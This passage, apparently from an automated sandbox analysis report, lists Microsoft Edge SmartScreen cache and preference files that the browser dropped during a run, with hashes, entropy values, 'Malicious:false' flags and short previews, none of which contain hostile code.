                                                                                                                                                                                                                                                                                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.013114387452759
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAci2gcRkYVn:YWLSGTt1o9LuLgfGBPAzkVj/T8FgcXV
                                                                                                                                                                                                                                                                                                MD5:F7DBCF89AAC9D512F0EB8A09BEC6D4A0
                                                                                                                                                                                                                                                                                                SHA1:82CA49692418697E562478FA099D05C336304099
                                                                                                                                                                                                                                                                                                SHA-256:13EBC20EC0B3BD3F11CC72A01C4EF1A681796EB2FA6F69671E3EF64D72F62DA6
                                                                                                                                                                                                                                                                                                SHA-512:B63B87F071768056B488621CE0A5D15D110CF53B134B27FA64050A78DB2BB25A3E265E4C24A35981DFF11DBDDD894DDD8C4C903C3152A649BF601B05B8F56516
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1741578216689472}]}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.389669793590032
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQ7:YQ3Kq9X0dMgAEiLIF
                                                                                                                                                                                                                                                                                                MD5:EFD056C9CBD5D43CC6E3D095B36640CE
                                                                                                                                                                                                                                                                                                SHA1:FF12176FD818DD10ABFEC995D9333D7B748AF9E2
                                                                                                                                                                                                                                                                                                SHA-256:D43B2B0C59364F9FD86C99EDEB6A871193653CF7870960833E71CADE1505CB03
                                                                                                                                                                                                                                                                                                SHA-512:19DA249BD04D3D5C4E6DD4A9D9AFF3436E7262896FF287865029E9A0B1EDE0B7A8BE879D999137E532B713B07D8C5A79E933A0D17050671B44AABE3204860A26
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":16}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a3c0d1fa-7813-4070-9147-29feb0e4f45d.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22665
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.047579416303581
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:itMkaMJH2m0engiVKzhSW3BLntNqVsNwhXJlmjhkME7DLjoksp3S5:2MkbJ6eg6KzhXRLtkV1tmjhkMgDXotI
                                                                                                                                                                                                                                                                                                MD5:A0EDB49DC298DEB06BB822BC0E543819
                                                                                                                                                                                                                                                                                                SHA1:F226CE8FC3B9E03D825843850DD14BBE4BD64013
                                                                                                                                                                                                                                                                                                SHA-256:493E105723DB44D083ADA9E39715A0B27577B92D812EAC12A9867D3405A3B938
                                                                                                                                                                                                                                                                                                SHA-512:87B95BF7804C9BBA3CDA0E354C0376A748ECC665630D38F68FC23140E8B4A4E4C6C575872151BEDD00B499600ECC529A6742E2DD5F8FC46FF44C403A746C9BB3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ae61ad3a-a85e-436f-9a64-e173f93d8bc1.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):9259
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.591016347922035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:mXqsNk5hUEHfx/T0j5Eih/cIyURLl8Rotoel2tBj2Vvl8xI6usE1ke4WJkhchuSE:psNwhP/CViRUejPxI6E1NkhC/pS4W
                                                                                                                                                                                                                                                                                                MD5:0E9B2D9D166B351CA876E77554462599
                                                                                                                                                                                                                                                                                                SHA1:CD96A4013DF2A8D9EDBC5D0B368C4555DABD3943
                                                                                                                                                                                                                                                                                                SHA-256:A898416F51640716D25A83DBE19DD8DF9F24B2FFBFDA9C4BBA18313D4F2AF714
                                                                                                                                                                                                                                                                                                SHA-512:22AC0509057A843C6903501E579EB7C4BD8D4A5DACF3EBA87056F18F4F28C6EFD8017578FA0CE9CFAC9E9F0AFB15D3ADC372F8541B2DCB7E936F6225D1031D5A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sidebar":{"upsell_trigger_count":1},"fire_local_softlanding_notification":false,"fre":{"has_first_v

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b11161a7-ae01-403e-a507-972502776d5b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22712
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.047566107204752
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:itMkaMJH2m0engiVKzhSW3BLntNqVsNwhXdlmjhkME7DLjoksp3S5:2MkbJ6eg6KzhXRLtkV1hmjhkMgDXotI
                                                                                                                                                                                                                                                                                                MD5:1279021E5D2CBA28555422C73345AE6E
                                                                                                                                                                                                                                                                                                SHA1:79B59C367936EDD54D7BA5F5D980E73849A44F8B
                                                                                                                                                                                                                                                                                                SHA-256:AB1972C6226A9E699ADB08D19C241C2C3EE7E949B6736EB01DEC9534A9AE0FD9
                                                                                                                                                                                                                                                                                                SHA-512:30C248FDAFB24A65A571EA505EF602D459D95FE67A0FF4129B31A8B23D8FC4033DE367D3310701BA5C44AF41B8909DD92696DFD190C6F8CB3B095552F521A119
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b399d19c-ea7a-46e0-a175-cf1bf375e54e.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8239
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794504740768509
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:fsNAJ/PeiRUFVjYkhk/6qRAq1k8SPxVLZ7VTiB:fsNA9TuZjhk/6q3QxVNZTiB
                                                                                                                                                                                                                                                                                                MD5:19B63CBAADCDB452DC5CCA5136F337AC
                                                                                                                                                                                                                                                                                                SHA1:9FFD01AC77A6307040D4FACC8B025643BD88B540
                                                                                                                                                                                                                                                                                                SHA-256:BA25057E8428947A5146685FD8580315A944939290C15BE7C4501A81C10823B9
                                                                                                                                                                                                                                                                                                SHA-512:FF3897462A0023E1846E1F74CEF8C520565B08494A5EE74BC6EC147D46B1A42D4E010E2507DE5FB9F0DC88477D587FB0B38B5FB8E2A185FDC37901A5DEFD7F47
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d667f100-0c2c-405f-96fb-91dbaf6be493.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):24891
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.03149834414542
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:2MkbJ6eg6KzhXRLtkpkhkPLjhkMgDXotI:2Mk16zRRSpk0WoI
                                                                                                                                                                                                                                                                                                MD5:0B94A20937FF4F790CC210DF97FB9307
                                                                                                                                                                                                                                                                                                SHA1:3D6E63AB173103126416AA7CF0D3FA4A4B326157
                                                                                                                                                                                                                                                                                                SHA-256:43A720D16FB4B862C3B5D350F5AF34EF4872775569F196308661803FB9769926
                                                                                                                                                                                                                                                                                                SHA-512:198332C569F220F4128CEBC101AEFB088129DF2EACD52B3CB598721F1D74FFE2115A670317EDA8B730808FAB5093A1CDB828B0056D53FDC18B2FCCA61C601018
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ea632c08-9917-4c2b-ac3e-6fb12936a6d6.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24840
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.032300931654385
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:2MkbJ6eg6KzhXRLtkp1hkPLjhkMgDXotI:2Mk16zRRSp10WoI
                                                                                                                                                                                                                                                                                                MD5:EBF2B0A5F773C00EB26C7CB6EB79BE3F
                                                                                                                                                                                                                                                                                                SHA1:589C41CBF1DF69143C41E829B1FB77E6623D84B5
                                                                                                                                                                                                                                                                                                SHA-256:B379B52E0DD361852C1A3C0D9E81AD17200D438C062502595BDAE715C0DBE39A
                                                                                                                                                                                                                                                                                                SHA-512:AC486AF69A0A69A9C329FC6A9768950C63AD4CD16C7A28EB634548627D40EB3A7CEA5BBF6A0E387579E8CA78C6519EA48858EA4725730A3A8F6C2C16122345CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13385951010573649","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

